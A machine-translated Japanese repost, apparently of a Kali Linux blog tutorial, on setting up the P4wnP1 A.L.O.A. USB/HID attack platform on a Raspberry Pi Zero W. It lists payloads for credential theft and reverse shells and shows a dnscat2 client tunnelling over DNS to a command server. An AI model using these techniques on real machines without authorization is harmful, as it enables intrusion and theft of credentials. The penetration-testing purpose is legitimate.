GNU/Linux >> Linux の 問題 >  >> Linux

コミュニティ ショーケース:Raspberry Pi Zero W P4wnP1 A.L.O.A.

Kali コミュニティは (いつものように) 懸命に取り組んでおり、Raspberry Pi Zero W 上の Kali Linux の非常にクールなプロジェクトであると思われるものを紹介したいと思います。「P4wnP1 A.L.O.A.」 (A ちょっと O 攻撃的なA

標準の Kali Linux イメージを使用し、Raspberry Pi Zero W 用に設計されたカスタム ソフトウェアと追加のファームウェアを追加して、攻撃と流出のスイス アーミー ナイフに変えます。 .

このブログ投稿では、Web インターフェイスの使用を開始し、トリガーを設定し、Kali Linux にある追加パッケージをインストールする方法について簡単に説明します。追加の攻撃シナリオをカバーするコミュニティからの追加の読み物と、より深く知りたい場合に人々が作成したより多くのペイロードが含まれています!

Raspberry Pi Zero W をお持ちの場合は、このイメージを試してみることを強くお勧めします。これは、あらゆるテスターのツールキットの優れたツールであると考えています!

買い物リスト

  • Raspberry Pi Zero W (ではない ゼロ 2 W)
  • Raspberry Pi Zero W USB-A アドオン ボード (オプションですが推奨)
  • MicroUSB - USB-A ケーブル (上記のアドオン ボードを使用しない場合に必要)
  • MicroSD カード (32GB 以上)
  • Kali Linux Raspberry Pi Zero W P4wnP1 A.L.O.A.画像

仕事に取り掛かるための設定

まず、Kali P4wnP1 A.L.O.A. をダウンロードします。 image.執筆時点での現在のバージョンは 2022.3 です:

[email protected]:~/Downloads$ ls
kali-linux-2022.3-raspberry-pi-zero-w-p4wnp1-aloa-armel.img.xz

ダウンロード ページに戻り、sum をクリックして、ダウンロードも確認します。 Raspberry Pi Zero W (P4wnP1 A.L.O.A) のリンク SHA256 チェックサムを取得する行:

[email protected]:~/Downloads$ echo "210635bb3dc7876b638a7035cd4dc60e0b134b19a6aec42a75f5995036b45840 kali-linux-2022.3-raspberry-pi-zero-w-p4wnp1-aloa-armel.img.xz" | sha256sum -c
kali-linux-2022.3-raspberry-pi-zero-w-p4wnp1-aloa-armel.img.xz: OK

ファイルをダウンロードして一致することを確認したので、システムの microSD カードに書き込みます。 /dev/sdb です - お使いのシステムでは異なる場合があります単にコピーして貼り付けないでください あなたがそうするので、私たちがここに置いたもの システムの /dev/sdb にあるものを上書きします

xzcat コマンドは、圧縮された画像ファイルを開き、それを dd にパイプします このコマンドは、microSD カードへの実際の書き込みを行います。 xzcat の使用 最初に実際に画像を解凍する必要がなくなるため、簡単なトリックです:

[email protected]:~/Downloads$ xzcat kali-linux-2022.3-raspberry-pi-zero-w-p4wnp1-aloa-armel.img.xz | sudo dd of=/dev/sdb bs=1M status=progress
[sudo] password for kali:
6421807104 bytes (6.4 GB, 6.0 GiB) copied, 101 s, 63.6 MB/s
0+577993 records in
0+577993 records out
6442450944 bytes (6.4 GB, 6.0 GiB) copied, 162.961 s, 39.5 MB/s

上記の速度はシステム上のものであり、システムと使用している microSD カードの速度によって異なります。

これが完了したら、microSD カードをマシンから取り外し、Raspberry Pi Zero W に接続します。「買い物リスト」セクションでリンクしたものと同様の USB-A アダプターを使用している場合は、コンピューターに接続して電源を入れることができます。それ以外の場合は、通常どおりマイクロポートを介して Raspberry Pi Zero W に電源を供給します。

Kali Linux の最初の起動では、ファイルシステムのサイズ変更やデフォルトの資格情報の設定などを行うため (user:kali 、パスワード:kali ) タイミングは microSD カードの速度によって異なります。

P4wnP1 A.L.O.A. の使用

起動したら、デフォルトのワイヤレス ネットワークが表示されたら準備完了です。 :💥🖥💥 Ⓟ➃ⓌⓃ🅟❶ .HDMI モニターが接続されていない場合に便利です!

上記の SSID を選択し、パスワード でログインします :MaMe82-P4wnP1 .

接続が完了したので、ワイヤレス デバイスが接続され、172.24.0.xxx/24 に IP アドレスが含まれていることがわかります。 範囲:

[email protected]:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: wlan0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 4096
    link/ether 00:03:7f:12:1f:ae brd ff:ff:ff:ff:ff:ff
    inet 172.24.0.12/24 brd 172.24.0.255 scope global dynamic noprefixroute wlan0
       valid_lft 297sec preferred_lft 297sec

wlan0 の IP アドレスが アダプターは 172.24.0.12 です 、だから私たちはつながっている !正常に接続されたので、ブラウザーで Web インターフェイスをプルアップしましょう。

デフォルト IP P4wnP1 A.L.O.A 画像のアドレスは 172.24.0.1 です サービスはポート 8000 でリッスンします ブラウザで http://172.24.0.1:8000/ にアクセスします。

ログインすると、上部にリストが表示されます:USB 設定Wi-Fi 設定Bluetoothネットワーク設定トリガー アクションHIDScriptイベント ログ および一般設定 .

以下のインターフェースを使用する際に注意すべき点が 1 つあります。ナビゲーション メニューの下には、現在表示されている画面に応じて、各セクションにさまざまなボタンがあります。これらのボタンの意味の凡例:

名前 機能
配備 有効化
保管された展開 保存されているものを読み込み、アクティブ化します
リセット デフォルト設定に戻る
ストア 保存
ロード ストアド 保存したものを読み込む
走る 現在の HID スクリプトを実行
ロード &置換 保存された HID スクリプトを読み込み、現在の内容を置き換えます
ロード &プリペンド 保存した HID スクリプトを読み込み、現在のスクリプトの先頭に追加します

USB 設定

ここで、ベンダー ID (VID) を変更できます &デバイスの製品 ID (PID) ですので、特定のストレージ デバイスになりすますことができます。製造元名を変更することもできます &商品名 、およびシリアル番号 本当に特定のデバイスのクローンを作成したい場合。

他のさまざまな設定を変更して、USB デバイスの動作を変更することもできます (キーボード、マウス、ネットワーク サポート、大容量ストレージ、さらにはシリアルを許可します)!

ここで指摘すべき優れたリソースは、USB デバイスに使用される既知の値の大規模なデータベースである USB ID リポジトリです。

Wi-Fi 設定

Wi-Fi 設定では、Wi-Fi SSID ネットワーク名を変更できます 、パスワード (別名、事前共有キー、PSK) と チャネル これは使用されています。これらの値を変更することで、特徴が少なくなり、背景に溶け込み始めることができます (また、既定の資格情報を使用しないことでより安全になります)。 !

設定を適用するには、[デプロイ] ボタンをクリックします。設定を変更して [展開] をクリックすると、接続が切断され、新しい設定で再接続する必要があることに注意してください。

デフォルトの Wi-Fi モードは アクセス ポイント (AP) です 、これにより、他のデバイスが P4wnP1 のワイヤレス ネットワークに接続できるようになります。

または、P4wnP1 を クライアント に設定することもできます AP ではなく、ネットワーク上で (クライアント モード)。定義済みの構成を使用して、P4wnP1 はネットワークに接続し、ネットワーク上の別のデバイスのように動作します。

最後のオプション、AP へのフォールオーバーを備えたクライアント 、P4wnP1がクライアントとして接続を試み、それが失敗した場合はアクセスポイントに切り替えるため、「両方の長所」を提供します。ナイス!

たとえば、このフォール オーバー モードで設定します。 kali Wi-Fi network の場合 範囲内にあり、正しいキーを持っている場合は、クライアントとしてそれに接続する必要があります。そうでない場合は、範囲内にない場合、またはそれを認識できない場合は、アクセス ポイント network を起動します .

電波が監視されている場合は、Wi-Fi ネットワークも無効にできます。

ブルートゥース

次に、Bluetooth の設定があります。

このセクションでは、Bluetooth を有効または無効にできます。検出可能の場合 、Bluetooth 名を設定できます 、(デフォルトは P4wnP1 です) ).Bluetooth PIN も設定できます 接続に使用されます (デフォルトの PIN は 1337 です ) - PIN は、「セキュア シンプル ペアリング (SSP)」がオフになっている場合にのみ使用されます。

Bluetooth ネットワーク設定の場合、P 個人的なA レア N ネットワーク プロファイル (PAN) が使用されます。通常、Bluetooth 接続の範囲は 10 メートル (33 フィート) であることに注意してください。

Bluetooth パーソナル エリア ネットワーク プロファイルに慣れていない可能性がある人のためのいくつかの簡単な定義:

プロフィール 定義
PANU ピアツーピア接続 (1 対 1)
PAN-GN 最大 8 台のデバイスのグループ アドホック ネットワーク (GN)
PAN-NAP Network Aggregation Point (NAP) は、Bluetooth 接続をワイヤレス接続にブリッジできます

したがって、P4wnP1 を PAN-NAP (デフォルト) に設定すると、最大 10 台のデバイスを Bluetooth 経由で P4wnP1 に接続し、そのネットワーク接続を共有できます。

PAN-GN でセットアップした場合、最大 7 台の追加デバイスを P4wnP1 に接続でき、相互に通信できますが、インターネット アクセスはありません。

また、PANU を使用する場合は、P4wnP1 に接続されたデバイスと P4wnP1 自体の間でのみデータを転送できます。

ネットワーク設定

次のタブは [ネットワーク設定] で、P4wnP1 へのさまざまな接続方法のオプションを変更できます .

Bluetooth (bteth) 経由で接続できます 、USB (usbeth) 、または現在のように Wi-Fi (wlan0) 経由 .

変更を加えるには、インターフェイスを選択し、DHCP を使用するなど、そのインターフェイスに変更を加えます または 静的 IP の設定 ここで一部の DHCP オプションを変更することもできます。内部では、dnsmasq が使用されています。

たとえば、ネットワーク DHCP サーバーを使用して Wi-Fi をクライアント モードに設定し、DHCP サーバーを実行しているフォールバック インターフェースとして Bluetooth を有効にしたい場合があります。

トリガー アクション

これでトリガーができました。

トリガーは、特定の条件が満たされたときに、P4wnP1 で物事を行う主な方法です。 トリガー アクションをペイロードと考えることができます .ここで何を設定しても、条件が満たされると、設定したアクションが実行されます .

トリガーは非常に強力で、それらを作成するときは限界があります。あなたの足を濡らすために、いくつかのトリガーアクションは次のとおりです:

  • サービスが開始されました - P4wnP1 でサービスが開始されたときに何かを行います
  • ホストに接続された USB ガジェット - P4wnP1 がホストに接続されているときに何かを行う
  • ホストから切断された USB ガジェット - P4wnP1 がホストから切断されたときに何かを行う
  • Wi-Fi アクセス ポイントが起動しています - P4wnP1 のアクセス ポイントが起動しているときに何かを行います
  • 既存の Wi-Fi に参加 - P4wnP1 がクライアントとして Wi-Fi ネットワークに参加したときに何かを行う
  • DHCP リースが発行されました - P4wnP1 に接続されたデバイスに DHCP リースが発行されたときに何かを行います
  • GPIO の入力 - Raspberry Pi GPIO ピンの入力に基づいて何かを行う
  • SSH ユーザー ログイン - ユーザーが SSH 経由で P4wnP1 にログインしたときに何かを行う

もう少し深く掘り下げたい場合 (そして意味のある命名値でワークフローをシンプルに保ちたい場合)グループ チャンネルを使用できます .名前が示すように、アクションをグループ化できます。これにより、ルールが読みやすくなり、ロジックがより複雑になります。これらのオプションは次のとおりです:

  • グループ チャンネルの値 - グループ チャンネルの特定の値が一致したときに何かを行う
  • グループ チャネルの複数の値 - グループ チャネルの複数の値が一致したら何かを行う

このシナリオの例として、「P4wnP1 で bash スクリプトを実行する」という最終結果が得られる可能性がありますが、これが発生する条件は、「Wi-Fi アクセス ポイントが稼働している」ことと「USB ガジェットがホストに接続されている」ことが両方ともある場合です。会った。そこで、いくつかのトリガーを作成します:

  • 「Wi-Fi アクセス ポイントが稼働中」の場合 -> グループ「接続済み」に値「1」を送信
  • 「ホストに接続された USB ガジェット」で -> グループ「接続済み」に値「2」を送信

3 番目のトリガーを作成することで、ルールを使用してさらに複雑なロジックを実行できます。 「正確な順序付けシーケンス」を使用して順序を制御できます。では、Wi-Fi アクセス ポイントが起動する前にデバイスが接続されていても問題になるのでしょうか?以下を使用して:

  • type "All (logical AND)" 順序は関係ありません アクションを実行するため
  • exact ordered sequence 順序が重要 アクションをトリガーするため

私たちが念頭に置いていることでは、特定の一連のイベントは必要ないため、 multiple values on group channel"; values (1,2); type "All (logical AND)" -> Start bash script を使用します .

イベントが発生するたびにではなく、一度だけトリガーされる「ワンショット」モードを有効にすることもできます。 P4wnP1 が別のデバイスとして偽装されている場合に便利です。最初にペイロードを実行した後、「通常の」動作をすることができます。

HIDスクリプト

DuckyScript を使用したことがある場合は、HIDScript タブに移ります。HIDscript は似ていますが、bash ではなく JavaScript に基づいています。

「HIDScripts」は Raspberry Pi デバイスで実行され、外部に接続された列挙された「偽の」ハードウェアとやり取りしますが、「bash スクリプト」は Raspberry Pi OS の「内部」で実行されます。

まず始めに、P4wnP1 には単純な HIDScript (hidtest1.js と呼ばれる) が事前に入力されています。 ) は、Windows コンピューターでメモ帳を起動し、フレーズを入力し、マウスを動かして、遅延なく繰り返します。詳細については、トリガーの例を参照してください。

この投稿の最後にあるその他のリソースでは、次のようなインスピレーションが必要な場合や必要な場合に、人々が作成した追加のペイロードを見つけることができます。

  • Chrome と Internet Explorer の資格情報、および保存されている Wi-Fi ネットワーク情報を抽出し、P4wnP1 にコピーします
  • ウェブページを開く
  • P4wnP1 が接続されているターゲット システムで管理者としてコマンドを実行します
  • PowerShell コマンドだけを使用して、管理者権限を持つリバース シェルを作成します

HIDscript の作成とデバッグを支援するには、RUN をクリックします。 トリガー アクションのイベントを実行するのではなく、いつでもボタンを実行してください。

イベント ログ

ログに記録するトリガーを設定している場合は、[イベント ログ] タブにイベントが記録されます。

イベント ログはのみ P4wnP1用システム自体のログは含まれません。

これは、作成中のペイロードとトリガーのデバッグ、アクションのプロセスの追跡、およびペイロードのコンテンツの取得に役立ちます。

一般設定

最後に、マスター テンプレート エディタの使用などを行うための汎用設定があります。 再起動だけでなく、起動するたびにデフォルトを制御する またはシャットダウン P4wnP1 デバイス、およびバックアップの作成 または復元 P4wnP1 データベース (設定とハードワークが保存されます)。

独自のトリガーの作成

P4wnP1 A.L.O.A. の Web インターフェイスの使用について説明したので、ここで得た情報を実践してみましょう。例として、P4wnP1 を次のように設定してみましょう。

P4wnP1 を Windows マシンに接続 USB ガジェット モードのとき 、デフォルトの HIDScript hidtest1.js を実行します コマンドを実行し、マウスを動かします。

まず、Web インターフェースに入り、トリガー アクションをクリックします。

次に、[追加] をクリックします。 、次のモーダル ウィンドウが表示されます。設定を変更するには、有効にする必要があります。 、だから私たちもすぐにそれを行います:

この場合、次を選択します:USB gadget connected to host :

ここで、実行するアクションを選択します。これは、「HIDScript を開始する」です:

次に、ロードする HIDScript を選択します。この例では、hidtest1.js と呼ばれる、書き込まれたデフォルトの HIDscript をロードします。 、メモ帳を起動し、「Hello from P4wnP1 run」と入力し、マウスを右に移動してから左に移動すると、もう一度実行されますが、P4wnP1 がそれ​​らを実行できる速度を示すために、はるかに高速です。

作成した、またはコミュニティから取得した HIDScript は、P4wnP1 に追加されると、このリストに表示されます。以下のリストは、P4wnP1 に付属するデフォルトのものです。

最後に、トリガーを保存するために、Update をクリックします。 ボタン:

ハッピー ハッキング!

SSH 接続時のパッケージのインストール

P4wnP1 でインターネットにアクセスできる場合は、Kali のリポジトリをすべて利用できます。そのため、Raspberry Pi Zero W の Kali にインストールできるパッケージはすべて、作成した bash スクリプトで使用できます。トリガーを介してこれらのスクリプトにアクセスできます。

ただし、P4wnP1 に接続している場合は、kali のいずれかを使用して SSH 接続できます。 と root ユーザー。デフォルトの認証情報は次のとおりです:

  • kali / kali
  • root / toor

パッケージ dnscat2-client を P4wnP1 にインストールしてから、別の場所にセットアップ済みの dnscat2-server に接続します。

念のため、常に sudo apt update を実行したいと考えています。 パッケージをインストールする前に、確実に最新バージョンを入手してください:

[email protected]:~$ sudo apt update
[...]
[email protected]:~$
[email protected]:~$ sudo apt -y install dnscat2-client
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
Suggested packages:
  dnscat2-server
The following NEW packages will be installed:
  dnscat2-client
0 upgraded, 1 newly installed, 0 to remove and 0 not upgraded.
[...]

これで、dnscat2-server のセットアップ時に提案されたコマンドを実行するだけで済みます。 他のマシンで:

[email protected]:~$ dnscat --dns server=10.0.13.37,port=53 --secret=5672ddb107fe2f33e490a83e8d1036ca
Creating DNS driver:
 domain = (null)
 host   = 0.0.0.0
 port   = 53
 type   = TXT,CNAME,MX
 server = 10.0.13.37

** Peer verified with pre-shared secret!

Session established!

ハッピー ハッキング (再び)!

クレジット

P4wnP1 A.L.O.Aの原作者。 Marcus Mengs aka MaMe82 です。

Marcus が辞任する必要が生じたとき、Rogan Dawes がメンテナシップを引き継ぎました。

リマインダー

プロジェクトに取り組んでいる場合は、コミュニティが Kali Linux の上に構築するものを見るのが大好きです!

Twitter または Discord でご連絡ください。

その他のリソース

プロジェクト リソース :

  • P4wnP1 A.L.O.A.ホームページ
  • P4wnP1 ツイッター

カリ資源 :

  • Kali Linux P4wnP1 A.L.O.A.ドキュメンテーション

コミュニティ リソース :

  • OLED スクリーン用のスポットを備えた P4wnP1 用ケース
  • P4wnP1 A.L.O.A の OLED 画面で使用するメニュー
  • P4wnP1 A.L.O.A. の追加ペイロード
  • Raspberry Pi Zero W を使ったハッキン​​グ
  • Kali Linux P4wnP1 A.L.O.A.ガイド – セットアップ / 使用法 / 例
  • P4wnP1 A.L.O.A. — 高度な HID 攻撃デバイス
  • HID \ USB デバイスとしての Pi Zero (P4wnP1 A.L.A.O)
  • P4wnP1 A.L.O.A での OLED 画面の使用に関するビデオ
  • Windows HID ペイロード ジェネレーター

Linux
  1. Linuxコミュニティが特別な理由は何ですか?

  2. Linuxコミュニティでの信頼の構築

  3. Raspberry Pi 3 で画面を回転させる方法

  1. カーリーコミュニティのテーマ

  2. コミュニティ ショーケース:Raspberry Pi Zero W P4wnP1 A.L.O.A.

  3. ラズベリーパイ4とカーリー

  1. RaspberryPiでLinuxを学ぶ

  2. ラズベリーパイのモノ

  3. Raspberry PI での Java の経験はありますか?